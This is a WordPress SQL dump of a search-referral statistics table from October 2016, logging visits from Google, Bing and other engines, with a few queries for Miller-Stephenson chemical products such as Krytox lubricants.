INSERT INTO `wp_statistics_search` VALUES (1242, '2016-10-13', 'google', 'www.google.com', '', 3704); 
INSERT INTO `wp_statistics_search` VALUES (1243, '2016-10-13', 'yahoo', 'r.search.yahoo.com', '', 3706); 
INSERT INTO `wp_statistics_search` VALUES (1244, '2016-10-13', 'google', 'www.google.com', '', 3708); 
INSERT INTO `wp_statistics_search` VALUES (1245, '2016-10-13', 'google', 'www.google.ca', '', 3709); 
INSERT INTO `wp_statistics_search` VALUES (1246, '2016-10-13', 'yahoo', 'r.search.yahoo.com', '', 3710); 
INSERT INTO `wp_statistics_search` VALUES (1247, '2016-10-13', 'google', 'www.google.ca', '', 3711); 
INSERT INTO `wp_statistics_search` VALUES (1248, '2016-10-13', 'google', 'www.google.ca', '', 3714); 
INSERT INTO `wp_statistics_search` VALUES (1249, '2016-10-13', 'google', 'www.google.com', '', 3715); 
INSERT INTO `wp_statistics_search` VALUES (1250, '2016-10-13', 'google', 'www.google.com', '', 3720); 
INSERT INTO `wp_statistics_search` VALUES (1251, '2016-10-13', 'google', 'www.google.com', '', 3722); 
INSERT INTO `wp_statistics_search` VALUES (1252, '2016-10-13', 'google', 'www.google.co.uk', '', 3724); 
INSERT INTO `wp_statistics_search` VALUES (1253, '2016-10-13', 'google', 'www.google.com', '', 3727); 
INSERT INTO `wp_statistics_search` VALUES (1254, '2016-10-13', 'google', 'www.google.com', '', 3728); 
INSERT INTO `wp_statistics_search` VALUES (1255, '2016-10-13', 'google', 'www.google.com', '', 3732); 
INSERT INTO `wp_statistics_search` VALUES (1256, '2016-10-13', 'google', 'www.google.com', '', 3735); 
INSERT INTO `wp_statistics_search` VALUES (1257, '2016-10-13', 'google', 'www.google.com', '', 3736); 
INSERT INTO `wp_statistics_search` VALUES (1258, '2016-10-13', 'google', 'www.google.com', '', 3738); 
INSERT INTO `wp_statistics_search` VALUES (1259, '2016-10-13', 'google', 'www.google.com', '', 3739); 
INSERT INTO `wp_statistics_search` VALUES (1260, '2016-10-13', 'google', 'www.google.com.uy', '', 3742); 
INSERT INTO `wp_statistics_search` VALUES (1261, '2016-10-13', 'google', 'www.google.com', '', 3744); 
INSERT INTO `wp_statistics_search` VALUES (1262, '2016-10-13', 'google', 'www.google.com', '', 3748); 
INSERT INTO `wp_statistics_search` VALUES (1263, '2016-10-13', 'google', 'www.google.com', '', 3752); 
INSERT INTO `wp_statistics_search` VALUES (1264, '2016-10-13', 'bing', 'www.bing.com', 'miller stephenson contact lubricants', 3753); 
INSERT INTO `wp_statistics_search` VALUES (1265, '2016-10-13', 'google', 'www.google.com', '', 3754); 
INSERT INTO `wp_statistics_search` VALUES (1266, '2016-10-13', 'google', 'www.google.ca', '', 3756); 
INSERT INTO `wp_statistics_search` VALUES (1267, '2016-10-13', 'google', 'www.google.com', '', 3757); 
INSERT INTO `wp_statistics_search` VALUES (1268, '2016-10-13', 'google', 'www.google.ca', '', 3758); 
INSERT INTO `wp_statistics_search` VALUES (1269, '2016-10-13', 'google', 'www.google.ca', '', 3759); 
INSERT INTO `wp_statistics_search` VALUES (1270, '2016-10-13', 'google', 'www.google.com', '', 3760); 
INSERT INTO `wp_statistics_search` VALUES (1271, '2016-10-13', 'google', 'www.google.com', '', 3761); 
INSERT INTO `wp_statistics_search` VALUES (1272, '2016-10-13', 'google', 'www.google.com', '', 3764); 
INSERT INTO `wp_statistics_search` VALUES (1273, '2016-10-13', 'google', 'www.google.com', '', 3766); 
INSERT INTO `wp_statistics_search` VALUES (1274, '2016-10-13', 'google', 'www.google.com', '', 3768); 
INSERT INTO `wp_statistics_search` VALUES (1275, '2016-10-13', 'google', 'www.google.com', '', 3780); 
INSERT INTO `wp_statistics_search` VALUES (1276, '2016-10-13', 'google', 'www.google.com', '', 3782); 
INSERT INTO `wp_statistics_search` VALUES (1277, '2016-10-13', 'google', 'www.google.com', '', 3787); 
INSERT INTO `wp_statistics_search` VALUES (1278, '2016-10-13', 'google', 'www.google.com', '', 3788); 
INSERT INTO `wp_statistics_search` VALUES (1279, '2016-10-13', 'google', 'www.google.com', '', 3789); 
INSERT INTO `wp_statistics_search` VALUES (1280, '2016-10-13', 'bing', 'www.bing.com', '', 3790); 
INSERT INTO `wp_statistics_search` VALUES (1281, '2016-10-13', 'google', 'www.google.com', '', 3791); 
INSERT INTO `wp_statistics_search` VALUES (1282, '2016-10-13', 'google', 'www.google.com', '', 3792); 
INSERT INTO `wp_statistics_search` VALUES (1283, '2016-10-13', 'google', 'www.google.com.co', '', 3793); 
INSERT INTO `wp_statistics_search` VALUES (1284, '2016-10-13', 'google', 'www.google.com', '', 3794); 
INSERT INTO `wp_statistics_search` VALUES (1285, '2016-10-13', 'google', 'www.google.com', '', 3795); 
INSERT INTO `wp_statistics_search` VALUES (1286, '2016-10-13', 'google', 'www.google.com', '', 3796); 
INSERT INTO `wp_statistics_search` VALUES (1287, '2016-10-13', 'bing', 'www.bing.com', 'miller-stephenson', 3802); 
INSERT INTO `wp_statistics_search` VALUES (1288, '2016-10-13', 'google', 'www.google.com', '', 3803); 
INSERT INTO `wp_statistics_search` VALUES (1289, '2016-10-13', 'google', 'www.google.com', '', 3805); 
INSERT INTO `wp_statistics_search` VALUES (1290, '2016-10-13', 'google', 'www.google.com', '', 3807); 
INSERT INTO `wp_statistics_search` VALUES (1291, '2016-10-13', 'google', 'www.google.com', '', 3808); 
INSERT INTO `wp_statistics_search` VALUES (1292, '2016-10-13', 'google', 'www.google.ie', '', 3815); 
INSERT INTO `wp_statistics_search` VALUES (1293, '2016-10-13', 'google', 'www.google.com', '', 3822); 
INSERT INTO `wp_statistics_search` VALUES (1294, '2016-10-13', 'google', 'www.google.com', '', 3825); 
INSERT INTO `wp_statistics_search` VALUES (1295, '2016-10-13', 'google', 'www.google.com', '', 3826); 
INSERT INTO `wp_statistics_search` VALUES (1296, '2016-10-13', 'google', 'www.google.com', '', 3827); 
INSERT INTO `wp_statistics_search` VALUES (1297, '2016-10-13', 'google', 'www.google.com', '', 3831); 
INSERT INTO `wp_statistics_search` VALUES (1298, '2016-10-13', 'google', 'www.google.com', '', 3832); 
INSERT INTO `wp_statistics_search` VALUES (1299, '2016-10-13', 'bing', 'www.bing.com', 'EPON Resin 1031', 3834); 
INSERT INTO `wp_statistics_search` VALUES (1300, '2016-10-13', 'google', 'www.google.ca', '', 3835); 
INSERT INTO `wp_statistics_search` VALUES (1301, '2016-10-13', 'google', 'www.google.com', '', 3836); 
INSERT INTO `wp_statistics_search` VALUES (1302, '2016-10-13', 'google', 'www.google.com', '', 3846); 
INSERT INTO `wp_statistics_search` VALUES (1303, '2016-10-13', 'yahoo', 'r.search.yahoo.com', '', 3847); 
INSERT INTO `wp_statistics_search` VALUES (1304, '2016-10-13', 'google', 'www.google.com', '', 3848); 
INSERT INTO `wp_statistics_search` VALUES (1305, '2016-10-13', 'google', 'www.google.com', '', 3852); 
INSERT INTO `wp_statistics_search` VALUES (1306, '2016-10-13', 'bing', 'www.bing.com', 'PTFE coating for guide wires', 3853); 
INSERT INTO `wp_statistics_search` VALUES (1307, '2016-10-13', 'bing', 'www.bing.com', 'krytox nrt 8900', 3854); 
INSERT INTO `wp_statistics_search` VALUES (1308, '2016-10-13', 'google', 'www.google.com', '', 3855); 
INSERT INTO `wp_statistics_search` VALUES (1309, '2016-10-13', 'google', 'www.google.com', '', 3856); 
INSERT INTO `wp_statistics_search` VALUES (1310, '2016-10-13', 'google', 'www.google.co.uk', '', 3858); 
INSERT INTO `wp_statistics_search` VALUES (1311, '2016-10-13', 'google', 'www.google.com', '', 3859); 
INSERT INTO `wp_statistics_search` VALUES (1312, '2016-10-13', 'google', 'www.google.com', '', 3860); 
INSERT INTO `wp_statistics_search` VALUES (1313, '2016-10-13', 'google', 'www.google.com', '', 3862); 
INSERT INTO `wp_statistics_search` VALUES (1314, '2016-10-13', 'google', 'www.google.com', '', 3864); 
INSERT INTO `wp_statistics_search` VALUES (1315, '2016-10-13', 'google', 'www.google.com', '', 3865); 
INSERT INTO `wp_statistics_search` VALUES (1316, '2016-10-13', 'google', 'www.google.gr', '', 3866); 
INSERT INTO `wp_statistics_search` VALUES (1317, '2016-10-13', 'google', 'www.google.com', '', 3867); 
INSERT INTO `wp_statistics_search` VALUES (1318, '2016-10-13', 'bing', 'www.bing.com', '', 3868); 
INSERT INTO `wp_statistics_search` VALUES (1319, '2016-10-13', 'google', 'www.google.com', '', 3869); 
INSERT INTO `wp_statistics_search` VALUES (1320, '2016-10-13', 'google', 'www.google.com', '', 3870); 
INSERT INTO `wp_statistics_search` VALUES (1321, '2016-10-13', 'bing', 'www.bing.com', 'stripping agents for epoxy paint', 3877); 
INSERT INTO `wp_statistics_search` VALUES (1322, '2016-10-13', 'google', 'www.google.com', '', 3878); 
INSERT INTO `wp_statistics_search` VALUES (1323, '2016-10-13', 'google', 'www.google.com', '', 3880); 
INSERT INTO `wp_statistics_search` VALUES (1324, '2016-10-13', 'google', 'www.google.com', '', 3881); 
INSERT INTO `wp_statistics_search` VALUES (1325, '2016-10-13', 'google', 'www.google.com', '', 3882); 
INSERT INTO `wp_statistics_search` VALUES (1326, '2016-10-13', 'yandex', 'yandex.ru', '', 3884); 
INSERT INTO `wp_statistics_search` VALUES (1327, '2016-10-13', 'google', 'www.google.com', '', 3886); 
INSERT INTO `wp_statistics_search` VALUES (1328, '2016-10-13', 'google', 'www.google.de', '', 3889); 
INSERT INTO `wp_statistics_search` VALUES (1329, '2016-10-13', 'google', 'www.google.com', '', 3891); 
INSERT INTO `wp_statistics_search` VALUES (1330, '2016-10-13', 'google', 'www.google.com', '', 3892); 
INSERT INTO `wp_statistics_search` VALUES (1331, '2016-10-13', 'yandex', 'yandex.ru', '', 3893); 
INSERT INTO `wp_statistics_search` VALUES (1332, '2016-10-13', 'google', 'www.google.com', '', 3896); 
INSERT INTO `wp_statistics_search` VALUES (1333, '2016-10-13', 'google', 'www.google.com', '', 3898); 
INSERT INTO `wp_statistics_search` VALUES (1334, '2016-10-13', 'google', 'www.google.com', '', 3899); 
INSERT INTO `wp_statistics_search` VALUES (1335, '2016-10-13', 'google', 'www.google.com', '', 3900); 
INSERT INTO `wp_statistics_search` VALUES (1336, '2016-10-13', 'google', 'www.google.com', '', 3901); 
INSERT INTO `wp_statistics_search` VALUES (1337, '2016-10-13', 'google', 'www.google.com', '', 3904); 
INSERT INTO `wp_statistics_search` VALUES (1338, '2016-10-13', 'google', 'www.google.com', '', 3905); 
INSERT INTO `wp_statistics_search` VALUES (1339, '2016-10-13', 'google', 'www.google.co.ve', '', 3910); 
INSERT INTO `wp_statistics_search` VALUES (1340, '2016-10-13', 'google', 'www.google.com', '', 3919); 
INSERT INTO `wp_statistics_search` VALUES (1341, '2016-10-13', 'google', 'www.google.com', '', 3923); 
INSERT INTO `wp_statistics_search` VALUES (1342, '2016-10-13', 'google', 'www.google.ca', '', 3924); 
INSERT INTO `wp_statistics_search` VALUES (1343, '2016-10-13', 'google', 'www.google.ca', '', 3925); 
INSERT INTO `wp_statistics_search` VALUES (1344, '2016-10-13', 'google', 'www.google.com', '', 3926); 
INSERT INTO `wp_statistics_search` VALUES (1345, '2016-10-13', 'bing', 'www.bing.com', '', 3928); 
INSERT INTO `wp_statistics_search` VALUES (1346, '2016-10-14', 'google', 'www.google.com', '', 3935); 
INSERT INTO `wp_statistics_search` VALUES (1347, '2016-10-14', 'google', 'www.google.com', '', 3942); 
INSERT INTO `wp_statistics_search` VALUES (1348, '2016-10-14', 'google', 'www.google.co.jp', '', 3946); 
INSERT INTO `wp_statistics_search` VALUES (1349, '2016-10-14', 'google', 'www.google.ca', '', 3947); 
INSERT INTO `wp_statistics_search` VALUES (1350, '2016-10-14', 'google', 'www.google.ca', '', 3957); 
INSERT INTO `wp_statistics_search` VALUES (1351, '2016-10-14', 'google', 'www.google.com.au', '', 3959); 
INSERT INTO `wp_statistics_search` VALUES (1352, '2016-10-14', 'google', 'www.google.com', '', 3966); 
INSERT INTO `wp_statistics_search` VALUES (1353, '2016-10-14', 'google', 'www.google.com', '', 3971); 
INSERT INTO `wp_statistics_search` VALUES (1354, '2016-10-14', 'bing', 'www.bing.com', 'miller stephenson', 3978); 
INSERT INTO `wp_statistics_search` VALUES (1355, '2016-10-14', 'google', 'www.google.com', '', 3982); 
INSERT INTO `wp_statistics_search` VALUES (1356, '2016-10-14', 'google', 'www.google.com', '', 3992); 
INSERT INTO `wp_statistics_search` VALUES (1357, '2016-10-14', 'google', 'www.google.com', '', 4004); 
INSERT INTO `wp_statistics_search` VALUES (1358, '2016-10-14', 'google', 'www.google.co.kr', '', 4009); 
INSERT INTO `wp_statistics_search` VALUES (1359, '2016-10-14', 'google', 'www.google.co.kr', '', 4011); 
INSERT INTO `wp_statistics_search` VALUES (1360, '2016-10-14', 'google', 'www.google.com.tr', '', 4015); 
INSERT INTO `wp_statistics_search` VALUES (1361, '2016-10-14', 'google', 'www.google.com.tr', '', 4016); 
INSERT INTO `wp_statistics_search` VALUES (1362, '2016-10-14', 'google', 'www.google.com', '', 4017); 
INSERT INTO `wp_statistics_search` VALUES (1363, '2016-10-14', 'bing', 'www.bing.com', '', 4018); 
INSERT INTO `wp_statistics_search` VALUES (1364, '2016-10-14', 'google', 'www.google.ca', '', 4020); 
INSERT INTO `wp_statistics_search` VALUES (1365, '2016-10-14', 'bing', 'www.bing.com', 'krytox xht lubricant', 4021); 
INSERT INTO `wp_statistics_search` VALUES (1366, '2016-10-14', 'google', 'www.google.com.tr', '', 4024); 
INSERT INTO `wp_statistics_search` VALUES (1367, '2016-10-14', 'google', 'www.google.com.tr', '', 4026); 
INSERT INTO `wp_statistics_search` VALUES (1368, '2016-10-14', 'google', 'www.google.com.tr', '', 4030); 
INSERT INTO `wp_statistics_search` VALUES (1369, '2016-10-14', 'google', 'www.google.com.tr', '', 4033); 
INSERT INTO `wp_statistics_search` VALUES (1370, '2016-10-14', 'google', 'www.google.com', '', 4040); 
INSERT INTO `wp_statistics_search` VALUES (1371, '2016-10-14', 'google', 'www.google.fr', '', 4049); 
INSERT INTO `wp_statistics_search` VALUES (1372, '2016-10-14', 'google', 'www.google.com', '', 4052); 
INSERT INTO `wp_statistics_search` VALUES (1373, '2016-10-14', 'google', 'www.google.co.in', '', 4054); 
INSERT INTO `wp_statistics_search` VALUES (1374, '2016-10-14', 'yahoo', 'r.search.yahoo.com', '', 4055); 
INSERT INTO `wp_statistics_search` VALUES (1375, '2016-10-14', 'google', 'www.google.com', '', 4058); 
INSERT INTO `wp_statistics_search` VALUES (1376, '2016-10-14', 'google', 'www.google.nl', '', 4059); 
INSERT INTO `wp_statistics_search` VALUES (1377, '2016-10-14', 'google', 'www.google.de', '', 4062); 
INSERT INTO `wp_statistics_search` VALUES (1378, '2016-10-14', 'google', 'www.google.fi', '', 4063); 
INSERT INTO `wp_statistics_search` VALUES (1379, '2016-10-14', 'google', 'www.google.cz', '', 4066); 
INSERT INTO `wp_statistics_search` VALUES (1380, '2016-10-14', 'yahoo', 'r.search.yahoo.com', '', 4067); 
INSERT INTO `wp_statistics_search` VALUES (1381, '2016-10-14', 'google', 'www.google.com.tr', '', 4068); 
INSERT INTO `wp_statistics_search` VALUES (1382, '2016-10-14', 'google', 'www.google.ca', '', 4074); 
INSERT INTO `wp_statistics_search` VALUES (1383, '2016-10-14', 'google', 'www.google.de', '', 4075); 
INSERT INTO `wp_statistics_search` VALUES (1384, '2016-10-14', 'google', 'www.google.com', '', 4076); 
INSERT INTO `wp_statistics_search` VALUES (1385, '2016-10-14', 'google', 'www.google.com', '', 4093); 
INSERT INTO `wp_statistics_search` VALUES (1386, '2016-10-14', 'google', 'www.google.com', '', 4096); 
INSERT INTO `wp_statistics_search` VALUES (1387, '2016-10-14', 'google', 'www.google.com', '', 4098); 
INSERT INTO `wp_statistics_search` VALUES (1388, '2016-10-14', 'google', 'www.google.com', '', 4102); 
INSERT INTO `wp_statistics_search` VALUES (1389, '2016-10-14', 'google', 'www.google.com', '', 4103); 
INSERT INTO `wp_statistics_search` VALUES (1390, '2016-10-14', 'google', 'www.google.com', '', 4104); 
INSERT INTO `wp_statistics_search` VALUES (1391, '2016-10-14', 'google', 'www.google.com', '', 4105); 
INSERT INTO `wp_statistics_search` VALUES (1392, '2016-10-14', 'google', 'www.google.com', 'ms 381hc', 4108); 
INSERT INTO `wp_statistics_search` VALUES (1393, '2016-10-14', 'google', 'www.google.ca', '', 4110); 
INSERT INTO `wp_statistics_search` VALUES (1394, '2016-10-14', 'google', 'www.google.com.br', '', 4113); 
INSERT INTO `wp_statistics_search` VALUES (1395, '2016-10-14', 'google', 'www.google.com', '', 4115); 
INSERT INTO `wp_statistics_search` VALUES (1396, '2016-10-14', 'google', 'www.google.ca', '', 4117); 
INSERT INTO `wp_statistics_search` VALUES (1397, '2016-10-14', 'google', 'www.google.com', '', 4118); 
INSERT INTO `wp_statistics_search` VALUES (1398, '2016-10-14', 'yahoo', 'r.search.yahoo.com', '', 4122); 
INSERT INTO `wp_statistics_search` VALUES (1399, '2016-10-14', 'google', 'www.google.com', '', 4125); 
INSERT INTO `wp_statistics_search` VALUES (1400, '2016-10-14', 'google', 'com.google.android.googlequicksearchbox', '', 4126); 
INSERT INTO `wp_statistics_search` VALUES (1401, '2016-10-14', 'google', 'www.google.ca', '', 4127); 
INSERT INTO `wp_statistics_search` VALUES (1402, '2016-10-14', 'google', 'www.google.com', '', 4128); 
INSERT INTO `wp_statistics_search` VALUES (1403, '2016-10-14', 'google', 'www.google.com', '', 4129); 
INSERT INTO `wp_statistics_search` VALUES (1404, '2016-10-14', 'google', 'www.google.com', '', 4131); 
INSERT INTO `wp_statistics_search` VALUES (1405, '2016-10-14', 'bing', 'www.bing.com', 'gpl-106 pfpe oil', 4132); 
INSERT INTO `wp_statistics_search` VALUES (1406, '2016-10-14', 'google', 'www.google.ca', '', 4135); 
INSERT INTO `wp_statistics_search` VALUES (1407, '2016-10-14', 'google', 'www.google.com', '', 4136); 
INSERT INTO `wp_statistics_search` VALUES (1408, '2016-10-14', 'bing', 'www.bing.com', '', 4137); 
INSERT INTO `wp_statistics_search` VALUES (1409, '2016-10-14', 'google', 'www.google.com', '', 4138); 
INSERT INTO `wp_statistics_search` VALUES (1410, '2016-10-14', 'google', 'www.google.com', '', 4141); 
INSERT INTO `wp_statistics_search` VALUES (1411, '2016-10-14', 'google', 'www.google.ca', '', 4142); 
INSERT INTO `wp_statistics_search` VALUES (1412, '2016-10-14', 'google', 'www.google.com', '', 4147); 
INSERT INTO `wp_statistics_search` VALUES (1413, '2016-10-14', 'google', 'www.google.com', '', 4151); 
INSERT INTO `wp_statistics_search` VALUES (1414, '2016-10-14', 'google', 'www.google.com.mx', '', 4153); 
INSERT INTO `wp_statistics_search` VALUES (1415, '2016-10-14', 'google', 'www.google.com', '', 4154); 
INSERT INTO `wp_statistics_search` VALUES (1416, '2016-10-14', 'google', 'www.google.com', '', 4155); 
INSERT INTO `wp_statistics_search` VALUES (1417, '2016-10-14', 'google', 'www.google.com', '', 4159); 
INSERT INTO `wp_statistics_search` VALUES (1418, '2016-10-14', 'google', 'www.google.com', '', 4160); 
INSERT INTO `wp_statistics_search` VALUES (1419, '2016-10-14', 'google', 'www.google.com', '', 4161); 
INSERT INTO `wp_statistics_search` VALUES (1420, '2016-10-14', 'google', 'www.google.com', '', 4162); 
INSERT INTO `wp_statistics_search` VALUES (1421, '2016-10-14', 'google', 'www.google.com', '', 4163); 
INSERT INTO `wp_statistics_search` VALUES (1422, '2016-10-14', 'google', 'www.google.com', '', 4164); 
INSERT INTO `wp_statistics_search` VALUES (1423, '2016-10-14', 'google', 'www.google.com', '', 4165); 
INSERT INTO `wp_statistics_search` VALUES (1424, '2016-10-14', 'google', 'www.google.com', '', 4166); 
INSERT INTO `wp_statistics_search` VALUES (1425, '2016-10-14', 'google', 'www.google.com', '', 4167); 
INSERT INTO `wp_statistics_search` VALUES (1426, '2016-10-14', 'yahoo', 'r.search.yahoo.com', '', 4168); 
INSERT INTO `wp_statistics_search` VALUES (1427, '2016-10-14', 'bing', 'www.bing.com', 'MILLER STEPHENSON CHEMICAL COMPANY INC ', 4171); 
INSERT INTO `wp_statistics_search` VALUES (1428, '2016-10-14', 'bing', 'www.bing.com', 'krytox vacuum pump oil VPF-1525', 4172); 
INSERT INTO `wp_statistics_search` VALUES (1429, '2016-10-14', 'google', 'www.google.com', '', 4173); 
INSERT INTO `wp_statistics_search` VALUES (1430, '2016-10-14', 'google', 'www.google.com', '', 4178); 
INSERT INTO `wp_statistics_search` VALUES (1431, '2016-10-14', 'google', 'www.google.com', '', 4181); 
INSERT INTO `wp_statistics_search` VALUES (1432, '2016-10-14', 'google', 'www.google.com', '', 4182); 
INSERT INTO `wp_statistics_search` VALUES (1433, '2016-10-14', 'google', 'www.google.com', '', 4186); 
INSERT INTO `wp_statistics_search` VALUES (1434, '2016-10-14', 'google', 'www.google.com', '', 4187); 
INSERT INTO `wp_statistics_search` VALUES (1435, '2016-10-14', 'google', 'www.google.com', '', 4188); 
INSERT INTO `wp_statistics_search` VALUES (1436, '2016-10-14', 'google', 'www.google.com', '', 4190); 
INSERT INTO `wp_statistics_search` VALUES (1437, '2016-10-14', 'google', 'com.google.android.googlequicksearchbox', '', 4191); 
INSERT INTO `wp_statistics_search` VALUES (1438, '2016-10-14', 'google', 'www.google.ca', '', 4194); 
INSERT INTO `wp_statistics_search` VALUES (1439, '2016-10-14', 'google', 'www.google.com', '', 4196); 
INSERT INTO `wp_statistics_search` VALUES (1440, '2016-10-14', 'google', 'www.google.com', '', 4202); 
INSERT INTO `wp_statistics_search` VALUES (1441, '2016-10-14', 'google', 'www.google.com', '', 4203); 
INSERT INTO `wp_statistics_search` VALUES (1442, '2016-10-14', 'google', 'www.google.com', '', 4204); 
INSERT INTO `wp_statistics_search` VALUES (1443, '2016-10-14', 'bing', 'www.bing.com', 'MILLER STEPHENSON MS-322B', 4206); 
INSERT INTO `wp_statistics_search` VALUES (1444, '2016-10-14', 'google', 'www.google.com', '', 4209); 
INSERT INTO `wp_statistics_search` VALUES (1445, '2016-10-14', 'google', 'www.google.co.in', '', 4214); 
INSERT INTO `wp_statistics_search` VALUES (1446, '2016-10-14', 'google', 'www.google.com', '', 4218); 
INSERT INTO `wp_statistics_search` VALUES (1447, '2016-10-14', 'google', 'www.google.com', '', 4220); 
INSERT INTO `wp_statistics_search` VALUES (1448, '2016-10-14', 'google', 'www.google.com', '', 4221); 
INSERT INTO `wp_statistics_search` VALUES (1449, '2016-10-14', 'google', 'www.google.com', '', 4224); 
INSERT INTO `wp_statistics_search` VALUES (1450, '2016-10-14', 'google', 'www.google.com', '', 4226); 
INSERT INTO `wp_statistics_search` VALUES (1451, '2016-10-14', 'google', 'www.google.com', '', 4227); 
INSERT INTO `wp_statistics_search` VALUES (1452, '2016-10-14', 'yahoo', 'r.search.yahoo.com', '', 4228); 
INSERT INTO `wp_statistics_search` VALUES (1453, '2016-10-14', 'google', 'www.google.com', '', 4229); 
INSERT INTO `wp_statistics_search` VALUES (1454, '2016-10-14', 'google', 'www.google.com', '', 4233); 
INSERT INTO `wp_statistics_search` VALUES (1455, '2016-10-14', 'google', 'www.google.com', '', 4234); 
INSERT INTO `wp_statistics_search` VALUES (1456, '2016-10-14', 'google', 'www.google.com', '', 4235); 
INSERT INTO `wp_statistics_search` VALUES (1457, '2016-10-14', 'google', 'www.google.com', '', 4237); 
INSERT INTO `wp_statistics_search` VALUES (1458, '2016-10-14', 'bing', 'www.bing.com', 'thread sealant non reactive with chlorine', 4239); 
INSERT INTO `wp_statistics_search` VALUES (1459, '2016-10-14', 'google', 'www.google.com', '', 4243); 
INSERT INTO `wp_statistics_search` VALUES (1460, '2016-10-14', 'google', 'www.google.ca', '', 4249); 
INSERT INTO `wp_statistics_search` VALUES (1461, '2016-10-14', 'google', 'www.google.com', '', 4250); 
INSERT INTO `wp_statistics_search` VALUES (1462, '2016-10-14', 'google', 'www.google.ca', '', 4256); 
INSERT INTO `wp_statistics_search` VALUES (1463, '2016-10-14', 'google', 'com.google.android.googlequicksearchbox', '', 4258); 
INSERT INTO `wp_statistics_search` VALUES (1464, '2016-10-14', 'google', 'www.google.com', '', 4261); 
INSERT INTO `wp_statistics_search` VALUES (1465, '2016-10-14', 'bing', 'www.bing.com', 'miller stephenson chemical', 4263); 
INSERT INTO `wp_statistics_search` VALUES (1466, '2016-10-14', 'google', 'www.google.com', '', 4265); 
INSERT INTO `wp_statistics_search` VALUES (1467, '2016-10-14', 'google', 'www.google.com', '', 4266); 
INSERT INTO `wp_statistics_search` VALUES (1468, '2016-10-14', 'google', 'www.google.com', '', 4269); 
INSERT INTO `wp_statistics_search` VALUES (1469, '2016-10-14', 'google', 'www.google.com', '', 4270); 
INSERT INTO `wp_statistics_search` VALUES (1470, '2016-10-14', 'google', 'www.google.com', '', 4275); 
INSERT INTO `wp_statistics_search` VALUES (1471, '2016-10-14', 'google', 'www.google.co.ve', '', 4276); 
INSERT INTO `wp_statistics_search` VALUES (1472, '2016-10-14', 'google', 'www.google.com', '', 4283); 
INSERT INTO `wp_statistics_search` VALUES (1473, '2016-10-14', 'google', 'www.google.com', '', 4289); 
INSERT INTO `wp_statistics_search` VALUES (1474, '2016-10-14', 'bing', 'www.bing.com', '', 4291); 
INSERT INTO `wp_statistics_search` VALUES (1475, '2016-10-14', 'google', 'www.google.com', '', 4293); 
INSERT INTO `wp_statistics_search` VALUES (1476, '2016-10-14', 'google', 'www.google.com.au', '', 4300); 
INSERT INTO `wp_statistics_search` VALUES (1477, '2016-10-14', 'google', 'www.google.com', '', 4304); 
INSERT INTO `wp_statistics_search` VALUES (1478, '2016-10-15', 'google', 'www.google.com.mx', '', 4312); 
INSERT INTO `wp_statistics_search` VALUES (1479, '2016-10-15', 'google', 'www.google.co.kr', '', 4327); 
INSERT INTO `wp_statistics_search` VALUES (1480, '2016-10-15', 'google', 'www.google.com', '', 4331); 
INSERT INTO `wp_statistics_search` VALUES (1481, '2016-10-15', 'google', 'www.google.com', '', 4334); 
INSERT INTO `wp_statistics_search` VALUES (1482, '2016-10-15', 'google', 'www.google.com', '', 4338); 
INSERT INTO `wp_statistics_search` VALUES (1483, '2016-10-15', 'bing', 'www.bing.com', 'opteon sion', 4340); 
INSERT INTO `wp_statistics_search` VALUES (1484, '2016-10-15', 'google', 'www.google.com', '', 4344); 
INSERT INTO `wp_statistics_search` VALUES (1485, '2016-10-15', 'google', 'www.google.com.pg', '', 4351); 
INSERT INTO `wp_statistics_search` VALUES (1486, '2016-10-15', 'bing', 'www.bing.com', 'krytox ts4', 4354); 
INSERT INTO `wp_statistics_search` VALUES (1487, '2016-10-15', 'google', 'www.google.com', '', 4358); 
INSERT INTO `wp_statistics_search` VALUES (1488, '2016-10-15', 'google', 'www.google.com', '', 4360); 
INSERT INTO `wp_statistics_search` VALUES (1489, '2016-10-15', 'google', 'www.google.com', '', 4361); 
INSERT INTO `wp_statistics_search` VALUES (1490, '2016-10-15', 'google', 'www.google.ca', '', 4371); 
INSERT INTO `wp_statistics_search` VALUES (1491, '2016-10-15', 'google', 'www.google.co.th', '', 4391); 
INSERT INTO `wp_statistics_search` VALUES (1492, '2016-10-15', 'google', 'www.google.nl', '', 4394); 
INSERT INTO `wp_statistics_search` VALUES (1493, '2016-10-15', 'google', 'www.google.be', '', 4400); 
INSERT INTO `wp_statistics_search` VALUES (1494, '2016-10-15', 'google', 'www.google.com', '', 4403); 
INSERT INTO `wp_statistics_search` VALUES (1495, '2016-10-15', 'google', 'www.google.com', '', 4405); 
INSERT INTO `wp_statistics_search` VALUES (1496, '2016-10-15', 'google', 'www.google.com.br', '', 4408); 
INSERT INTO `wp_statistics_search` VALUES (1497, '2016-10-15', 'google', 'www.google.com', '', 4409); 
INSERT INTO `wp_statistics_search` VALUES (1498, '2016-10-15', 'google', 'www.google.co.in', '', 4411); 
INSERT INTO `wp_statistics_search` VALUES (1499, '2016-10-15', 'google', 'www.google.com', '', 4419); 
INSERT INTO `wp_statistics_search` VALUES (1500, '2016-10-15', 'google', 'www.google.az', '', 4425); 
INSERT INTO `wp_statistics_search` VALUES (1501, '2016-10-15', 'google', 'www.google.co.za', '', 4428); 
INSERT INTO `wp_statistics_search` VALUES (1502, '2016-10-15', 'bing', 'www.bing.com', ' 49 oil machineries manufacturing companies contact email mail', 4432); 
INSERT INTO `wp_statistics_search` VALUES (1503, '2016-10-15', 'google', 'www.google.ca', '', 4438); 
INSERT INTO `wp_statistics_search` VALUES (1504, '2016-10-15', 'google', 'www.google.ca', '', 4441); 
INSERT INTO `wp_statistics_search` VALUES (1505, '2016-10-15', 'google', 'www.google.com', '', 4446); 
INSERT INTO `wp_statistics_search` VALUES (1506, '2016-10-15', 'google', 'www.google.com', '', 4451); 
INSERT INTO `wp_statistics_search` VALUES (1507, '2016-10-15', 'google', 'www.google.com', '', 4456); 
INSERT INTO `wp_statistics_search` VALUES (1508, '2016-10-15', 'google', 'www.google.ca', '', 4457); 
INSERT INTO `wp_statistics_search` VALUES (1509, '2016-10-15', 'google', 'www.google.ca', '', 4463); 
INSERT INTO `wp_statistics_search` VALUES (1510, '2016-10-15', 'google', 'www.google.co.in', '', 4470); 
INSERT INTO `wp_statistics_search` VALUES (1511, '2016-10-15', 'google', 'www.google.com', '', 4472); 
INSERT INTO `wp_statistics_search` VALUES (1512, '2016-10-15', 'google', 'www.google.com', '', 4476); 
INSERT INTO `wp_statistics_search` VALUES (1513, '2016-10-15', 'google', 'www.google.com.mx', '', 4477); 
INSERT INTO `wp_statistics_search` VALUES (1514, '2016-10-15', 'google', 'www.google.com', '', 4478); 
